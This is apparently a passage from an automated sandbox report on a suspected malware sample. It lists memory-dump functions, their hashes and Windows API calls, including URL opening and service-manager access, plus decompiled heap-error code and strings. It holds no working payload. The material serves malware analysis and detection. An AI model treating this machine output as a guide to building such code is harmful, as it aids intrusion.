Opcode Fuzzy Hash: b8fd16777128ab1bdf53bc06c234ecc55baebb1f24a48bfe5f4f2399a328b70d
Instruction Fuzzy Hash: 283168B411FAD086D722D67885723C77FE9AF82225B69C988C0E10B673C2125467DB21

Uniqueness

Uniqueness Score: -1.00%

Function 00568A9F, Relevance: 1.6, APIs: 1, Instructions: 128COMMON

Download Yara Rule

APIs

OpenSCManagerA.ADVAPI32 ref: 00568D3C

Memory Dump Source

Source File: 0000000A.00000002.486789978.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: ManagerOpen
String ID:
API String ID: 1889721586-0
Opcode ID: 99e8d5767baf2d165cabbfef723377b8ee7b1fb607b9131f2e5c5226eab10124
Instruction ID: e0bf1c297e7e1da1b8f62c95f58ac8d27510e72db2e473f26977f70b9ab3fd0b
Opcode Fuzzy Hash: 99e8d5767baf2d165cabbfef723377b8ee7b1fb607b9131f2e5c5226eab10124
Instruction Fuzzy Hash: 59316674505600CEEF258A18C4283F53FB6BFA23B5FAA4755CD628B5F2C72148C6CB22

Uniqueness

Uniqueness Score: -1.00%

Function 00562A88, Relevance: 1.6, APIs: 1, Instructions: 128threadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNELBASE(000000FE,00000000), ref: 00562B17

Memory Dump Source

Source File: 0000000A.00000002.486789978.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: TerminateThread
String ID:
API String ID: 1852365436-0
Opcode ID: 50f8e9138d5a60a444194f97d7c59291c94896a46f30806cb0c5b246b3ea6de4
Instruction ID: 686a935484929fed20cdb20f2178126c8472f8782a6f5b929dc3ac33030c2f65
Opcode Fuzzy Hash: 50f8e9138d5a60a444194f97d7c59291c94896a46f30806cb0c5b246b3ea6de4
Instruction Fuzzy Hash: 16118970704706AFE7205F58C9D5B893F69FF4A364F604261E952871E2C3328D858522

Uniqueness

Uniqueness Score: -1.00%

Function 005643EC, Relevance: 1.6, APIs: 1, Instructions: 127libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00564464: InternetOpenA.WININET(00564C8E,00000000,00000000,00000000,00000000,00564E94), ref: 00564478
Part of subcall function 00564464: InternetOpenUrlA.WININET(?,00000000,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 00564585

LdrInitializeThunk.NTDLL(00564E94), ref: 00564D3C

Memory Dump Source

Source File: 0000000A.00000002.486789978.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: InternetOpen$InitializeThunk
String ID:
API String ID: 518753361-0
Opcode ID: 8ca2f6d22e15fb4799ce2f84b297e5808bb850bcc212eef124574939ce8e4c76
Instruction ID: 86e69aebed22690bf5c3d372944e1fc4a90995714714a938dda8423b4b35a652
Opcode Fuzzy Hash: 8ca2f6d22e15fb4799ce2f84b297e5808bb850bcc212eef124574939ce8e4c76
Instruction Fuzzy Hash: 1B315CA511FAD0C6C722D66C85737C77FFEAEC2269329D988D0D10B673C10265A3D762

Uniqueness

Uniqueness Score: -1.00%

Function 00568A5B, Relevance: 1.6, APIs: 1, Instructions: 124COMMON

Download Yara Rule

APIs

OpenSCManagerA.ADVAPI32 ref: 00568D3C

Memory Dump Source

Source File: 0000000A.00000002.486789978.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: ManagerOpen
String ID:
API String ID: 1889721586-0
Opcode ID: c1aa527bddc293ec31893e0c374b1de3ff4abaa52f7ff20f50b8b610dee57785
Instruction ID: 7c585332e637ec3f109c67082d3a2922d3d77ee7f14142f53a3de43ed164a905
Opcode Fuzzy Hash: c1aa527bddc293ec31893e0c374b1de3ff4abaa52f7ff20f50b8b610dee57785
Instruction Fuzzy Hash: E7314674505601CEEF254A14C4287F53F75BFA23A5FAA4B45CD628B5B2C73188C6CB22

Uniqueness

Uniqueness Score: -1.00%

Function 00564C30, Relevance: 1.6, APIs: 1, Instructions: 122libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00564464: InternetOpenA.WININET(00564C8E,00000000,00000000,00000000,00000000,00564E94), ref: 00564478
Part of subcall function 00564464: InternetOpenUrlA.WININET(?,00000000,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 00564585

LdrInitializeThunk.NTDLL(00564E94), ref: 00564D3C

Memory Dump Source

Source File: 0000000A.00000002.486789978.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: InternetOpen$InitializeThunk
String ID:
API String ID: 518753361-0
Opcode ID: 0818007333ab62079258c129d0fd4722e39da7fed6b98f9b90acb47c1cf3d54c
Instruction ID: e30185d42e5b675d2f26bec85a61f738b32338c020d4404da9e66f4a157e738d
Opcode Fuzzy Hash: 0818007333ab62079258c129d0fd4722e39da7fed6b98f9b90acb47c1cf3d54c
Instruction Fuzzy Hash: 633147A511FBD086C712D27C85737C77FEEAEC3265369D988D0D10B673820265A3DB22

Uniqueness

Uniqueness Score: -1.00%

Function 00568AEE, Relevance: 1.6, APIs: 1, Instructions: 119COMMON

Download Yara Rule

APIs

OpenSCManagerA.ADVAPI32 ref: 00568D3C

Memory Dump Source

Source File: 0000000A.00000002.486789978.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: ManagerOpen
String ID:
API String ID: 1889721586-0
Opcode ID: 1da97ad7123a0188f23de302798f9fd398232d2bd24a5b43f75d876a68f03591
Instruction ID: ce59dccafd33f24f009126e28afaa66186c1b8c2f8cb41a0296f3ec7e57dd834
Opcode Fuzzy Hash: 1da97ad7123a0188f23de302798f9fd398232d2bd24a5b43f75d876a68f03591
Instruction Fuzzy Hash: 24313374505600CEEF258A14C4287F53FB6BFA23A5FAA0745CD628B1F2C72188C68B22

Uniqueness

Uniqueness Score: -1.00%

Function 00568B7E, Relevance: 1.6, APIs: 1, Instructions: 117COMMON

Download Yara Rule

APIs

OpenSCManagerA.ADVAPI32 ref: 00568D3C

Memory Dump Source

Source File: 0000000A.00000002.486789978.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: ManagerOpen
String ID:
API String ID: 1889721586-0
Opcode ID: 25e03d28b54e86fe45385a61437ca309d4252c7a93129a4652039c2abe466c6d
Instruction ID: 0d984c7dfb5c259ac9214ead0839f1cdfdcc1d4ffed0c5f2b2525398a7414eeb
Opcode Fuzzy Hash: 25e03d28b54e86fe45385a61437ca309d4252c7a93129a4652039c2abe466c6d
Instruction Fuzzy Hash: FA313474105601CEEF259A28C5283F53FB6AFA23B5FAA4744CE624B5F2C72148C6CB21

Uniqueness

Uniqueness Score: -1.00%

Function 00568B2F, Relevance: 1.6, APIs: 1, Instructions: 116COMMON

Download Yara Rule

APIs

OpenSCManagerA.ADVAPI32 ref: 00568D3C

Memory Dump Source

Source File: 0000000A.00000002.486789978.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: ManagerOpen
String ID:
API String ID: 1889721586-0
Opcode ID: d9bfb6f94b1458487bc8d8a2080582f70a1a9b251b14ca2661f4dfd7e04782be
Instruction ID: 2052c21d8ce62923dfb2436e33491c795e6a1d29e015b845d121a7ecd543fc0e
Opcode Fuzzy Hash: d9bfb6f94b1458487bc8d8a2080582f70a1a9b251b14ca2661f4dfd7e04782be
Instruction Fuzzy Hash: 54315674505601CEEF255A18C4283F53F76BFA23B5F9A4745CD628B5F2C72188C6CB22

Uniqueness

Uniqueness Score: -1.00%

Function 00564520, Relevance: 1.6, APIs: 1, Instructions: 100networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlA.WININET(?,00000000,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 00564585

Memory Dump Source

Source File: 0000000A.00000002.486789978.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: InternetOpen
String ID:
API String ID: 2038078732-0
Opcode ID: 9db08ab1429b3eb96a930fefbbd89b4482852e6dc649b2f438c3b1ebc07dc352
Instruction ID: c81644e5fd27b74dc4e6e427a58e1d39dbac574c2f7ef0dae274556f2196b39c
Opcode Fuzzy Hash: 9db08ab1429b3eb96a930fefbbd89b4482852e6dc649b2f438c3b1ebc07dc352
Instruction Fuzzy Hash: 78316170105786CBEB35DD14CD61BEF3FAAEF86354F608424ED469B5A3D33159819E20

Uniqueness

Uniqueness Score: -1.00%

Function 00564264, Relevance: 1.6, APIs: 1, Instructions: 95libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00564464: InternetOpenA.WININET(00564C8E,00000000,00000000,00000000,00000000,00564E94), ref: 00564478
Part of subcall function 00564464: InternetOpenUrlA.WININET(?,00000000,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 00564585

LdrInitializeThunk.NTDLL(00564E94), ref: 00564D3C

Memory Dump Source

Source File: 0000000A.00000002.486789978.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: InternetOpen$InitializeThunk
String ID:
API String ID: 518753361-0
Opcode ID: aae9403b7b53ef3d5e242468c933cec8da7fac152cc9a32222528baba69a02d5
Instruction ID: da9a4bade81ddd1664c9c106652eca718cb3699061344cf202e6d5aeae871cc9
Opcode Fuzzy Hash: aae9403b7b53ef3d5e242468c933cec8da7fac152cc9a32222528baba69a02d5
Instruction Fuzzy Hash: 9421777020E780C6DB21DB7985663C77FE9BF82314F65C48CC4D10B273C2215456DB52

Uniqueness

Uniqueness Score: -1.00%

Function 00564C1C, Relevance: 1.6, APIs: 1, Instructions: 94libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00564464: InternetOpenA.WININET(00564C8E,00000000,00000000,00000000,00000000,00564E94), ref: 00564478
Part of subcall function 00564464: InternetOpenUrlA.WININET(?,00000000,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 00564585

LdrInitializeThunk.NTDLL(00564E94), ref: 00564D3C

Memory Dump Source

Source File: 0000000A.00000002.486789978.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: InternetOpen$InitializeThunk
String ID:
API String ID: 518753361-0
Opcode ID: fba9e58707775837ca6098307951fef54e4fe14f437dcdb737bca496daad17b6
Instruction ID: e6ec8ae5b6f1c2f82b8d356d670484ea846548b32c948a22a1362f759a73c66c
Opcode Fuzzy Hash: fba9e58707775837ca6098307951fef54e4fe14f437dcdb737bca496daad17b6
Instruction Fuzzy Hash: C721796521FBD0C5D712D67886763C37FE9AF83260B69898CC8C10B6B3C2126963DB52

Uniqueness

Uniqueness Score: -1.00%

Function 005644C4, Relevance: 1.6, APIs: 1, Instructions: 91networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlA.WININET(?,00000000,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 00564585

Memory Dump Source

Source File: 0000000A.00000002.486789978.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: InternetOpen
String ID:
API String ID: 2038078732-0
Opcode ID: c70637a4aa6433be83538c929977d9342db8c3f3b79ed2bd44b5053745bc2c7c
Instruction ID: eba78704120ba10bbcb55093a6264ce40e700fb0d874f73b000436ca991d08a2
Opcode Fuzzy Hash: c70637a4aa6433be83538c929977d9342db8c3f3b79ed2bd44b5053745bc2c7c
Instruction Fuzzy Hash: 1C31D27020034B9FFF349E10CE55BEE3AA6FF55780FA48429ED4AAB180E7718980DE11

Uniqueness

Uniqueness Score: -1.00%

Function 00568C1E, Relevance: 1.6, APIs: 1, Instructions: 88COMMON

Download Yara Rule

APIs

OpenSCManagerA.ADVAPI32 ref: 00568D3C

Memory Dump Source

Source File: 0000000A.00000002.486789978.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: ManagerOpen
String ID:
API String ID: 1889721586-0
Opcode ID: b2b8d3d8e68f01d808ff54c8e82822e0a790a52e363e3dd11ee5cdddba4fbd86
Instruction ID: f725639362c356ced165ac6343ccde7fe44b6e3795f2e2d47b200b9091ea2b36
Opcode Fuzzy Hash: b2b8d3d8e68f01d808ff54c8e82822e0a790a52e363e3dd11ee5cdddba4fbd86
Instruction Fuzzy Hash: 7D2104341056008EEF258A14C5287F53FBAAFA2375F6A5784C9628B5F2C72188C6CA31

Uniqueness

Uniqueness Score: -1.00%

Function 00562AF8, Relevance: 1.6, APIs: 1, Instructions: 72threadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNELBASE(000000FE,00000000), ref: 00562B17

Memory Dump Source

Source File: 0000000A.00000002.486789978.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: TerminateThread
String ID:
API String ID: 1852365436-0
Opcode ID: d6398dbe7ed004298b3de53adc206521305db73af7a3b4e096213d03301bbf55
Instruction ID: 42f767bf732ded7845cb4d70bd8ca08023259526b360b35b741c3194737fd362
Opcode Fuzzy Hash: d6398dbe7ed004298b3de53adc206521305db73af7a3b4e096213d03301bbf55
Instruction Fuzzy Hash: 07115670700706AFEB205E58C9D9B9A3F6AFF8A364F604265E952872E1C3728D858522

Uniqueness

Uniqueness Score: -1.00%

Function 005665EF, Relevance: 1.6, APIs: 1, Instructions: 57libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,321C9581,?,00567B48,00562F5F,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 005666B7

Memory Dump Source

Source File: 0000000A.00000002.486789978.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 7a4382c0d6e83dab92d94f9d7e22fe68cd64740dbf0e556171c76bff31b10c7a
Instruction ID: 02d65b5d820514fd21ac817ee7860e6289eb30bb0db6edfa69c8ca41f4ddac37
Opcode Fuzzy Hash: 7a4382c0d6e83dab92d94f9d7e22fe68cd64740dbf0e556171c76bff31b10c7a
Instruction Fuzzy Hash: E1014781E6032679FF243254FD89BFB0968EF96370F250026FC9283141EB68CCC64692

Uniqueness

Uniqueness Score: -1.00%

Function 00566688, Relevance: 1.5, APIs: 1, Instructions: 29libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,321C9581,?,00567B48,00562F5F,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 005666B7

Memory Dump Source

Source File: 0000000A.00000002.486789978.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: fbd2a249b309219d76d3efe19b491c779795efaef2046a579b7e7bb66e9855dc
Instruction ID: 4cb28011963175a425262587a0c9be94064d9cb49f8db4bbd4c04d0a3f306f50
Opcode Fuzzy Hash: fbd2a249b309219d76d3efe19b491c779795efaef2046a579b7e7bb66e9855dc
Instruction Fuzzy Hash: 26E0D851F50326B2EF1436A8BD097DA5A559F4A670F254062FCC157151EB74C8C58A81

Uniqueness

Uniqueness Score: -1.00%

Function 00568D14, Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

OpenSCManagerA.ADVAPI32 ref: 00568D3C

Memory Dump Source

Source File: 0000000A.00000002.486789978.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: ManagerOpen
String ID:
API String ID: 1889721586-0
Opcode ID: 86a7c8f09d7776a022ffefd88ea33dd2acd4dc4b172e65b7c5e81002bd81b3fe
Instruction ID: 771d242a6e034fbb97a9606b4d80e424aaace0e9f2f133f23367ec28d3ae7f87
Opcode Fuzzy Hash: 86a7c8f09d7776a022ffefd88ea33dd2acd4dc4b172e65b7c5e81002bd81b3fe
Instruction Fuzzy Hash: BCE086286152169DAB597E34C4582F53B32BDB37A139C0B49CE629B5A4EB210C84C320

Uniqueness

Uniqueness Score: -1.00%

Function 00563FCD, Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,00563F2C,00563FFF), ref: 00563FF1

Memory Dump Source

Source File: 0000000A.00000002.486789978.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 9c3d5031f2b206f8869a8b9d01a37ea8d2ec8d91a61341a7a5e3d798ed9e5fde
Instruction ID: 9d1073ec6ed6d5e44fd0c69f17fedcda770366230613c9f6646ca6fe143f3974
Opcode Fuzzy Hash: 9c3d5031f2b206f8869a8b9d01a37ea8d2ec8d91a61341a7a5e3d798ed9e5fde
Instruction Fuzzy Hash: 47D01230BF4304FDFA2449608E57FEA6112DFD1F60F64820CBF4A285C5A6E05440C516

Uniqueness

Uniqueness Score: -1.00%

Function 1E3E967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1E3E9694

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 54eb535eb8f520dcc7b7c2daf27c8c74a8059a2dbb81c8e4e1b86340ba26bada
Instruction ID: ee8f6295c3d00ad3366357643f49832a070fdd6ca318626694bc1ea0cc8d5a11
Opcode Fuzzy Hash: 54eb535eb8f520dcc7b7c2daf27c8c74a8059a2dbb81c8e4e1b86340ba26bada
Instruction Fuzzy Hash: 80B09B719014D5C9D611D761460C71B790177D0751F97C2A2D1120641E477CC0D1F6B6

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 1E45B260, Relevance: 37.8, Strings: 30, Instructions: 262COMMON

Download Yara Rule

Strings

The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 1E45B3D6
*** enter .exr %p for the exception record, xrefs: 1E45B4F1
Go determine why that thread has not released the critical section., xrefs: 1E45B3C5
write to, xrefs: 1E45B4A6
The critical section is owned by thread %p., xrefs: 1E45B3B9
This failed because of error %Ix., xrefs: 1E45B446
The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 1E45B38F
If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 1E45B314
This means that the I/O device reported an I/O error. Check your hardware., xrefs: 1E45B476
The instruction at %p tried to %s , xrefs: 1E45B4B6
*** A stack buffer overrun occurred in %ws:%s, xrefs: 1E45B2F3
The resource is owned exclusively by thread %p, xrefs: 1E45B374
*** Resource timeout (%p) in %ws:%s, xrefs: 1E45B352
The instruction at %p referenced memory at %p., xrefs: 1E45B432
This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 1E45B47D
*** An Access Violation occurred in %ws:%s, xrefs: 1E45B48F
The resource is owned shared by %d threads, xrefs: 1E45B37E
*** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 1E45B53F
<unknown>, xrefs: 1E45B27E, 1E45B2D1, 1E45B350, 1E45B399, 1E45B417, 1E45B48E
*** Inpage error in %ws:%s, xrefs: 1E45B418
The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 1E45B323
This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 1E45B305
read from, xrefs: 1E45B4AD, 1E45B4B2
an invalid address, %p, xrefs: 1E45B4CF
*** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 1E45B2DC
a NULL pointer, xrefs: 1E45B4E0
*** Critical Section Timeout (%p) in %ws:%s, xrefs: 1E45B39B
This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 1E45B484
*** enter .cxr %p for the context, xrefs: 1E45B50D
*** then kb to get the faulting stack, xrefs: 1E45B51C

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
API String ID: 0-108210295
Opcode ID: cfc5cef8f1c51411d170a820341a323a3da388004a4e6423b8154a49e1a22bc1
Instruction ID: 8997eb2fda247cb47e6d97ba914eef3cf47613cbd5bd1c4505421a82b046f135
Opcode Fuzzy Hash: cfc5cef8f1c51411d170a820341a323a3da388004a4e6423b8154a49e1a22bc1
Instruction Fuzzy Hash: A9811479900160FFDB215B06DC4AEAB3B26AF4A756F80474AF4062B312D3659512EFB2

Uniqueness

Uniqueness Score: -1.00%

Function 1E461C06, Relevance: 31.4, Strings: 25, Instructions: 195
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E1E461C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x1e3848a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E1E3AB150();
				} else {
					E1E3AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x1e49589c);
				E1E3AB150("Heap error detected at %p (heap handle %p)\n",  *0x1e4958a0);
				_t27 =  *0x1e495898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M1E461E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E1E3AB150();
				} else {
					E1E3AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E1E3AB150("Error code: %d - %s\n",  *0x1e495898);
				_t113 =  *0x1e4958a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E1E3AB150();
					} else {
						E1E3AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E1E3AB150("Parameter1: %p\n",  *0x1e4958a4);
				}
				_t115 =  *0x1e4958a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E1E3AB150();
					} else {
						E1E3AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E1E3AB150("Parameter2: %p\n",  *0x1e4958a8);
				}
				_t117 =  *0x1e4958ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E1E3AB150();
					} else {
						E1E3AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E1E3AB150("Parameter3: %p\n",  *0x1e4958ac);
				}
				_t119 =  *0x1e4958b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E1E3AB150();
					} else {
						E1E3AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x1e4958b4);
					E1E3AB150("Last known valid blocks: before - %p, after - %p\n",  *0x1e4958b0);
				} else {
					_t120 =  *0x1e4958b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E1E3AB150();
				} else {
					E1E3AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E1E3AB150("Stack trace available at %p\n", 0x1e4958c0);
			}

0x1e461c10
0x1e461c16
0x1e461c1e
0x1e461c3d
0x1e461c3e
0x1e461c20
0x1e461c35
0x1e461c3a
0x1e461c44
0x1e461c55
0x1e461c5a
0x1e461c65
0x1e461c67
0x00000000
0x1e461c6e
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x1e461c67
0x1e461cdc
0x1e461ce5
0x1e461d04
0x1e461d05
0x1e461ce7
0x1e461cfc
0x1e461d01
0x1e461d0b
0x1e461d17
0x1e461d1f
0x1e461d25
0x1e461d30
0x1e461d4f
0x1e461d50
0x1e461d32
0x1e461d47
0x1e461d4c
0x1e461d61
0x1e461d67
0x1e461d68
0x1e461d6e
0x1e461d79
0x1e461d98
0x1e461d99
0x1e461d7b
0x1e461d90
0x1e461d95
0x1e461daa
0x1e461db0
0x1e461db1
0x1e461db7
0x1e461dc2
0x1e461de1
0x1e461de2
0x1e461dc4
0x1e461dd9
0x1e461dde
0x1e461df3
0x1e461df9
0x1e461dfa
0x1e461e00
0x1e461e0a
0x1e461e13
0x1e461e32
0x1e461e33
0x1e461e15
0x1e461e2a
0x1e461e2f
0x1e461e39
0x1e461e4a
0x1e461e02
0x1e461e02
0x1e461e08
0x00000000
0x00000000
0x1e461e08
0x1e461e5b
0x1e461e7a
0x1e461e7b
0x1e461e5d
0x1e461e72
0x1e461e77
0x1e461e95

Strings

heap_failure_cross_heap_operation, xrefs: 1E461CC2
heap_failure_generic, xrefs: 1E461C7C
heap_failure_freelists_corruption, xrefs: 1E461CC9
Last known valid blocks: before - %p, after - %p, xrefs: 1E461E45
Error code: %d - %s, xrefs: 1E461D12
Parameter3: %p, xrefs: 1E461DEE
Parameter2: %p, xrefs: 1E461DA5
heap_failure_listentry_corruption, xrefs: 1E461CD0
heap_failure_entry_corruption, xrefs: 1E461C83
heap_failure_block_not_busy, xrefs: 1E461CA6
heap_failure_lfh_bitmap_mismatch, xrefs: 1E461CD7
heap_failure_invalid_argument, xrefs: 1E461CAD
heap_failure_multiple_entries_corruption, xrefs: 1E461C8A
heap_failure_buffer_underrun, xrefs: 1E461C9F
Parameter1: %p, xrefs: 1E461D5C
Stack trace available at %p, xrefs: 1E461E86
HEAP: , xrefs: 1E461C16, 1E461C3D, 1E461D04, 1E461D4F, 1E461D98, 1E461DE1, 1E461E32, 1E461E7A
HEAP[%wZ]: , xrefs: 1E461C30, 1E461CF7, 1E461D42, 1E461D8B, 1E461DD4, 1E461E25, 1E461E6D
heap_failure_buffer_overrun, xrefs: 1E461C98
heap_failure_usage_after_free, xrefs: 1E461CBB
Heap error detected at %p (heap handle %p), xrefs: 1E461C50
heap_failure_internal, xrefs: 1E461C6E
heap_failure_unknown, xrefs: 1E461C75
heap_failure_invalid_allocation_type, xrefs: 1E461CB4
heap_failure_virtual_block_corruption, xrefs: 1E461C91

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
